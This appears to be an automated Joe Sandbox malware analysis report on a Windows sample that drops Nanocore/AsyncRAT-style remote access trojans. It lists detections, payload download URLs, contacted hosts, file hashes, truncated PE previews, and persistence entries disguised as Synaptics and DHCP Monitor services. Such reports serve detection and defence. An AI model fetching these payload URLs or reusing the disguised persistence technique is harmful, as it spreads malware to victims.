            20.0.Synaptics.exe.870000.1.unpack100%AviraHEUR/AGEN.1109339Download File
            21.0.Synaptics.exe.e40000.20.unpack100%AviraHEUR/AGEN.1109339Download File
            16.0.._cache_WINDOWS.EXE.d70000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
            21.0.Synaptics.exe.e40000.11.unpack100%AviraHEUR/AGEN.1109339Download File
            11.0.._cache_WINDOWS.EXE.5b0000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
            23.0.Synaptics.exe.400000.8.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            23.0.Synaptics.exe.400000.8.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            23.0.Synaptics.exe.400000.8.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            23.0.Synaptics.exe.400000.8.unpack100%AviraTR/Dropper.GenDownload File
            23.0.Synaptics.exe.400000.8.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            4.0.y8kdmHi6x3.exe.400000.6.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            4.0.y8kdmHi6x3.exe.400000.6.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            4.0.y8kdmHi6x3.exe.400000.6.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            4.0.y8kdmHi6x3.exe.400000.6.unpack100%AviraTR/Dropper.GenDownload File
            4.0.y8kdmHi6x3.exe.400000.6.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            16.2.._cache_WINDOWS.EXE.d70000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
            8.0.Synaptics.exe.bc0000.0.unpack100%AviraHEUR/AGEN.1109339Download File
            4.0.y8kdmHi6x3.exe.bc0000.2.unpack100%AviraHEUR/AGEN.1109339Download File
            4.2.y8kdmHi6x3.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            4.2.y8kdmHi6x3.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            4.2.y8kdmHi6x3.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            4.2.y8kdmHi6x3.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
            4.2.y8kdmHi6x3.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            23.0.Synaptics.exe.400000.6.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            23.0.Synaptics.exe.400000.6.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            23.0.Synaptics.exe.400000.6.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            23.0.Synaptics.exe.400000.6.unpack100%AviraTR/Dropper.GenDownload File
            23.0.Synaptics.exe.400000.6.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            21.0.Synaptics.exe.e40000.3.unpack100%AviraHEUR/AGEN.1109339Download File
            4.0.y8kdmHi6x3.exe.bc0000.13.unpack100%AviraHEUR/AGEN.1109339Download File
            4.0.y8kdmHi6x3.exe.400000.16.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            4.0.y8kdmHi6x3.exe.400000.16.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            4.0.y8kdmHi6x3.exe.400000.16.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            4.0.y8kdmHi6x3.exe.400000.16.unpack100%AviraTR/Dropper.GenDownload File
            4.0.y8kdmHi6x3.exe.400000.16.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            21.0.Synaptics.exe.e40000.15.unpack100%AviraHEUR/AGEN.1109339Download File
            4.0.y8kdmHi6x3.exe.400000.10.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            4.0.y8kdmHi6x3.exe.400000.10.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            4.0.y8kdmHi6x3.exe.400000.10.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            4.0.y8kdmHi6x3.exe.400000.10.unpack100%AviraTR/Dropper.GenDownload File
            4.0.y8kdmHi6x3.exe.400000.10.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            21.2.Synaptics.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            21.2.Synaptics.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            21.2.Synaptics.exe.400000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            21.2.Synaptics.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
            21.2.Synaptics.exe.400000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            23.0.Synaptics.exe.8b0000.20.unpack100%AviraHEUR/AGEN.1109339Download File
            4.0.y8kdmHi6x3.exe.bc0000.25.unpack100%AviraHEUR/AGEN.1109339Download File
            23.0.Synaptics.exe.400000.12.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            23.0.Synaptics.exe.400000.12.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            23.0.Synaptics.exe.400000.12.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            23.0.Synaptics.exe.400000.12.unpack100%AviraTR/Dropper.GenDownload File
            23.0.Synaptics.exe.400000.12.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            23.0.Synaptics.exe.8b0000.5.unpack100%AviraHEUR/AGEN.1109339Download File
            11.2.._cache_WINDOWS.EXE.5b0000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
            20.0.Synaptics.exe.870000.3.unpack100%AviraHEUR/AGEN.1109339Download File
            21.0.Synaptics.exe.400000.12.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            21.0.Synaptics.exe.400000.12.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            21.0.Synaptics.exe.400000.12.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            21.0.Synaptics.exe.400000.12.unpack100%AviraTR/Dropper.GenDownload File
            21.0.Synaptics.exe.400000.12.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            15.0.Synaptics.exe.e80000.0.unpack100%AviraHEUR/AGEN.1109339Download File
            0.0.y8kdmHi6x3.exe.5b0000.0.unpack100%AviraHEUR/AGEN.1109339Download File
            23.2.Synaptics.exe.8b0000.4.unpack100%AviraHEUR/AGEN.1109339Download File
            6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack100%AviraTR/Dropper.GenDownload File
            20.0.Synaptics.exe.400000.16.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            20.0.Synaptics.exe.400000.16.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            20.0.Synaptics.exe.400000.16.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            20.0.Synaptics.exe.400000.16.unpack100%AviraTR/Dropper.GenDownload File
            20.0.Synaptics.exe.400000.16.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            20.0.Synaptics.exe.870000.11.unpack100%AviraHEUR/AGEN.1109339Download File
            4.0.y8kdmHi6x3.exe.400000.8.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            4.0.y8kdmHi6x3.exe.400000.8.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            4.0.y8kdmHi6x3.exe.400000.8.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            4.0.y8kdmHi6x3.exe.400000.8.unpack100%AviraTR/Dropper.GenDownload File
            4.0.y8kdmHi6x3.exe.400000.8.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            21.0.Synaptics.exe.e40000.0.unpack100%AviraHEUR/AGEN.1109339Download File
            23.0.Synaptics.exe.8b0000.7.unpack100%AviraHEUR/AGEN.1109339Download File
            21.0.Synaptics.exe.e40000.9.unpack100%AviraHEUR/AGEN.1109339Download File
            23.0.Synaptics.exe.400000.10.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            23.0.Synaptics.exe.400000.10.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            23.0.Synaptics.exe.400000.10.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            23.0.Synaptics.exe.400000.10.unpack100%AviraTR/Dropper.GenDownload File
            23.0.Synaptics.exe.400000.10.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            4.0.y8kdmHi6x3.exe.bc0000.0.unpack100%AviraHEUR/AGEN.1109339Download File
            20.0.Synaptics.exe.400000.10.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            20.0.Synaptics.exe.400000.10.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            20.0.Synaptics.exe.400000.10.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            20.0.Synaptics.exe.400000.10.unpack100%AviraTR/Dropper.GenDownload File
            20.0.Synaptics.exe.400000.10.unpack100%AviraW2000M/Dldr.Agent.17651006Download File
            23.0.Synaptics.exe.400000.14.unpack100%AviraWORM/Dldr.Agent.gqrxnDownload File
            23.0.Synaptics.exe.400000.14.unpack100%AviraW2000M/Dldr.Agent.17651006Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://xred.site50.net/syn/Synaptics.rarZ0%Avira URL Cloudsafe
            http://xred.site50.net/syn/Synaptics.rar4%VirustotalBrowse
            http://xred.site50.net/syn/Synaptics.rar0%Avira URL Cloudsafe
            https://docs.goog0%VirustotalBrowse
            https://docs.goog0%Avira URL Cloudsafe
            http://xred.site50.net/syn/SSLLibrary.dl0%Avira URL Cloudsafe
            http://xred.site50.net/syn/SSLLibrary.dll60%Avira URL Cloudsafe
            http://xred.site50.net/syn/SUpdate.iniZ0%Avira URL Cloudsafe
            http://xred.site50.net/syn/SUpdate.ini0%Avira URL Cloudsafe
            https://docs.goo0%Avira URL Cloudsafe
            http://xred.site50.net/syn/SSLLibrary.dlp0%Avira URL Cloudsafe
            http://xred.site50.net/syn/SUpdate.iniD00%Avira URL Cloudsafe
            http://xred.site50.net/syn/SUpdate.iniD0/0%Avira URL Cloudsafe
            http://schemas.microsof0%URL Reputationsafe
            http://xred.site50.net/syn/SSLLibrary.dll0%Avira URL Cloudsafe
            https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            freedns.afraid.org
            		69.42.215.252
            		truefalse
              		high
              docs.google.com
              		142.250.186.46
              		truefalse
                		high
                saw4.playit.gg
                		54.38.136.57
                		truefalse
                  		high
                  chivalrous-condition.auto.playit.gg
                  		unknown
                  		unknownfalse
                    		high
                    agonizing-bat.auto.playit.gg
                    		unknown
                    		unknownfalse
                      		high
                      xred.mooo.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                              		high
                              http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978$1Synaptics.exe, 00000014.00000002.527570253.00000000012C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://xred.site50.net/syn/Synaptics.rarSynaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://docs.googSynaptics.exe, 00000014.00000000.448364389.0000000008ECE000.00000004.00000010.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://docs.google.com/Synaptics.exe, 00000014.00000002.527672867.000000000131A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.447489062.00000000079A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://xred.site50.net/syn/SSLLibrary.dlWINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://docs.google.com/SSynaptics.exe, 00000014.00000000.447489062.00000000079A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://xred.site50.net/syn/SUpdate.iniSynaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://docs.gooSynaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://xred.site50.net/syn/SSLLibrary.dlpy8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://xred.site50.net/syn/SUpdate.iniD0y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://xred.site50.net/syn/SUpdate.iniD0/WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://schemas.microsofSYSTEM32.EXEfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://xred.site50.net/syn/SSLLibrary.dllSynaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlWINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://csp.withgoogle.com/csp/report-to/gse_l9ocaqSynaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  142.250.186.46
                                                  		docs.google.comUnited States
                                                  		15169GOOGLEUSfalse
                                                  54.38.136.57
                                                  		saw4.playit.ggFrance
                                                  		16276OVHFRfalse
                                                  69.42.215.252
                                                  		freedns.afraid.orgUnited States
                                                  		17048AWKNET-LLCUSfalse

                                                  Private

                                                  IP
                                                  192.168.2.1
                                                  127.0.0.1

                                                  General Information

                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                  Analysis ID:560001
                                                  Start date:26.01.2022
                                                  Start time:02:38:43
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 14m 52s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:y8kdmHi6x3.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:43
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@47/38@27/5
                                                  EGA Information:
                                                  • Successful, ratio: 83.3%
                                                  HDC Information:
                                                  • Successful, ratio: 36.2% (good quality ratio 35.3%)
                                                  • Quality average: 81.3%
                                                  • Quality standard deviation: 25.1%
                                                  HCA Information:
                                                  • Successful, ratio: 95%
                                                  • Number of executed functions: 258
                                                  • Number of non-executed functions: 254
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.88.177, 52.109.12.22, 52.109.8.24, 104.208.16.94
                                                  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, europe.configsvc1.live.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                  • Execution Graph export aborted for target SYSTEM32.EXE, PID 6952 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  02:39:40API Interceptor1x Sleep call for process: y8kdmHi6x3.exe modified
                                                  02:39:57AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                  02:40:00API Interceptor40x Sleep call for process: Synaptics.exe modified
                                                  02:40:05AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  02:40:06Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\Desktop\._cache_WINDOWS.EXE" s>$(Arg0)
                                                  02:40:09Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
                                                  02:40:09API Interceptor674x Sleep call for process: ._cache_WINDOWS.EXE modified
                                                  02:41:27API Interceptor1x Sleep call for process: WerFault.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASNs

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):208384
                                                  Entropy (8bit):7.451462755520174
                                                  Encrypted:false
                                                  SSDEEP:6144:ULV6Bta6dtJmakIM5n2B/XMekQlD/7W6Qyf0b:ULV6BtpmkbZXxVpQyf0b
                                                  MD5:568E6A074378730CEE0947C4C796372D
                                                  SHA1:7688894728B8207756F52384798E394DE8D54070
                                                  SHA-256:2F990B69464DAB55B2EBC8F6A302FE09E5767844B4AFB71B43A20A6C2EA48D8D
                                                  SHA-512:250A1215FD28E4CD5F6DA3E72B42A88F93664D4A2484D29F6141A81EF4968872B86379FB54AAF2E645D46EF8C881E43D1C32392DC3F7C381A86C252D7BDB2730
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 88%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 98%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................d........... ........@.. ......................................................................8...W.... .. `........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc... `... ...b..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..

                                                  C:\ProgramData\Synaptics\._cache_Synaptics.exe

                                                  Download File
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):0
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:24576:jFYnnsJ39LyjbJkQFMhmC+6GD9vApfbZXJf:jFunsHyjtk2MYC5GDtA1
                                                  MD5:3A5072A9A5DC35DFB99A59F67C3DC6C0
                                                  SHA1:335398BB44927DDB18905221C52A89AA101A3C7F
                                                  SHA-256:29BF88F94FFAB5559B5AF5A9DB05CFDBE2BEEB81301F1E64E851CFA925C930AC
                                                  SHA-512:B3B11F8E5B495C873A8AFA58FDC2F2FEF7E7D610A50516FB701DAB1197AC11A63E5F857F9B6ECF1A9B33FDF0D875ECF59695BE83FF35AFCBC23F8293D068E8FA
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, Author: Florian Roth
                                                  • Rule: Malware_QA_update, Description: VT Research QA uploaded malware - file update.exe, Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 93%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F..Q............m.>.....m...F...m.........3.........V...m.......m.=.....Rich............................PE..L....0.N.................z..........H2............@.......................................@.....................................<..................................`...............................H...@...............$............................text...Bx.......z.................. ..`.rdata...1.......2...~..............@..@.data...............................@....rsrc..............................@..@.reloc...............r..............@..B................................................................................................................................................................................................................................................................................................................................

                                                  C:\ProgramData\Synaptics\Synaptics.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\y8kdmHi6x3.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2083328
                                                  Entropy (8bit):7.943244956522882
                                                  Encrypted:false
                                                  SSDEEP:49152:NnA21ODDkXkNpkDWti0EcFKPxqq1VVmkvavPvYMo:NAdDDetDKXiJb1VVmkM3YJ
                                                  MD5:BFF363A92AC43FF249652A83DADC02AB
                                                  SHA1:3C7B47A3F4DC3C8555B656505244886CB3A172F5
                                                  SHA-256:D054E33DE2D63966C68B44DD1D1DE8A9B7ABB76781100FE82423C80E112D4580
                                                  SHA-512:8CEEF643926251A6D6B5FFEE6E662B68580992117D98DBD24CCFDE5CDAD429CE4719A92C63F470C2857272330C9F3A4A2D7F175A6300D6B1833A387F4B841D29
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 49%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 81%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.....................B......N.... ........@.. ....................... ...........@.....................................K........?.................... ...................................................... ............... ..H............text...T.... ...................... ..`.rsrc....?.......@..................@..@.reloc........ .....................@..B................0.......H.......H...............X"...t..........................................Z(.....(....s....(....*..(....*6.(.....(....*....0.......... .a..(....(....r...p(....(....o......r...po......(.....~....-6 ....r3..p......(...............(......(....(.........~....{....~.....o....*...........0.............. ...%.....(.....s ....s!..... ....o".... ....o#...($...r;..po%........ ....s&.........o'....[o(...o).......o*....[o(...o+.....o,.....o-....s............io/.....o0.......,...o1.....o2..

                                                  C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\y8kdmHi6x3.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\._cache_WINDOWS.EXE.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):525
                                                  Entropy (8bit):5.2874233355119316
                                                  Encrypted:false
